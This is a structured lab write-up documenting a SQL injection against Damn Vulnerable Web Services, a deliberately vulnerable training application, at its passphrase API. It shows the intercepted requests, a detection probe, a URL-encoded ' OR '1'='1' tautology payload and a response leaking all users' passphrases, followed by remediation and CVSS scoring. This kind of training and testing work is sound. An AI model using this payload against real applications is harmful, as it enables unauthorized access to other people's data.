## Version 1.4.1
## language: en

Feature:
  TOE:
    Damn Vulnerable Web Services - dvws
  Category:
    SQL Injection
  Location:
    http://dvws/passphrasegen.html
  CWE:
    CWE-89: Improper Neutralization of Special Elements used
    in an SQL Command ('SQL Injection')
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Inject SQL to get access to unathorized data
  Recommendation:
    Validate and sanitize inputs and use prepared SQL statements

  Background:
  Machine information:
    | <Software name>   |  <Version> |
    | VMWare ESX        |     6.5    |
    | Windows           |      10    |
    | Debian VM         |   10.4.6   |
    | Kali VM           |   2020.2   |
  Hacker Software:
    | Firefox           |   78.0.1   |
    | Burp              |   2020.7   |

  TOE information:
    Given I am accessing the site "http://dvws/"
    And is installed in a Debian VM
    And it is built with php and mysql

  Scenario: Normal use case
    Given I configure Burp on Kali to intercept web requests
    And I configure Firefox on Windows to use Burp as proxy
    When I login into dvws with user1
    And I access "http://dvws/passphrasegen.html"
    Then a request like this is intercepted
    """
    GET /api/v2/passphrase/user1 HTTP/1.1
    """
    And a response like this is received with the list of all passphrases
    """
    [{"passphrase":"7053716879475b7c5958585052608231","reminder":"test"}]
    """

  Scenario: Dynamic detection
    Given I configure Burp on Kali to intercept web requests
    And I configure Firefox on Windows to use Burp as proxy
    When I login into dvws with user1
    And I access "http://dvws/passphrasegen.html"
    Then a request like this is intercepted
    """
    GET /api/v2/passphrase/user1 HTTP/1.1
    """
    Then I send it to the Burp Repeater
    And I modify the "GET" line with the following text
    """
    GET /api/v2/passphrase/user1' HTTP/1.1
    """
    Then I receive a response with an error message
    """
    ER_PARSE_ERROR
    """
    Then I conclude the application is vulnerable to SQL injection

  Scenario: Exploitation
    Given I configure Burp on Kali to intercept web requests
    And I configure Firefox on Windows to use Burp as proxy
    When I login into dvws with user1
    And I access "http://dvws/passphrasegen.html"
    Then a request like this is intercepted
    """
    GET /api/v2/passphrase/user1 HTTP/1.1
    """
    Then I send it to the Burp Repeater
    And I inject the following SQL code translated into URL encoding
    """
    ' OR '1'='1'
    """
    Then the resulting line in the Burp Repeater is
    """
    GET /api/v2/passphrase/user1%27%20OR%20%271%27%3D%271%27%23 HTTP/1.1
    """
    Then I receive a response with the passphrases of all users
    """
    [{"passphrase":"3934356a4a38394b5458513b39714e33","reminder":"pass1"},
    {"passphrase":"5847384a6a5376457854565d37558130","reminder":"pass2"},
    {"passphrase":"7053716879475b7c5958585052608231","reminder":"test"}]
    """

  Scenario: Remediation
    Use prepared SQL statements and sanitize inputs

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      8.1 (high) - AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
    Temporal: Attributes that measure the exploit's popularity and fixability
      7.8 (high) - E:H/RL:X/RC:R
    Environmental: Unique and relevant attributes to a specific user environment
      8.5 (high) - CR:H/IR:X/AR:X/MAV:N/MAC:X/MPR:X/MUI:X/MS:X/MC:H/MI:X/MA:X

  Scenario: Correlations
    None
